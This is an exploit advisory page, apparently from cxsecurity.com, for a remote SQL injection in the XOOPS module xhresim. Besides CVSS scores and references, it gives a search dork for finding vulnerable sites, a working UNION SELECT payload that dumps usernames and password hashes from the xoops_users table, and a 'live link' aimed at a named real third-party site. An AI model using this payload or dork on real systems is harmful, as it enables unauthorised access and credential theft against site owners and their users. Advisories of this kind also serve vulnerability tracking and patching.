XOOPS Module xhresim (index.php no) Remote SQL Injection Vuln

2008.12.21
Credit: EcHoLL
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

########################################## # # XOOPS Module: xhresim All Version # # ########################################## # ##AUTHOR : EcHoLL ####HOME : http://www.warezturk.org # ####MAİL : echoll1983@hotmail.com # ########################################### # # DORKS 1 : dork: /modules/xhresim/# ########################################### target: http://scriptpage.com/modules/xhresim/index.php?no=[ Sql Code] sql code= 9999+union+select+0,concat(uname,0x3a,pass),2,3+from+xoops_users-- live link : http://www.sakakusu.net/saka/modules/xhresim/index.php?no=75+union+select+0,convert(database()%20using%20latin1),2,convert(user()%20using%20latin1)--

References:

http://xforce.iss.net/xforce/xfdb/45863
http://www.securityfocus.com/bid/31749
http://www.milw0rm.com/exploits/6748


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top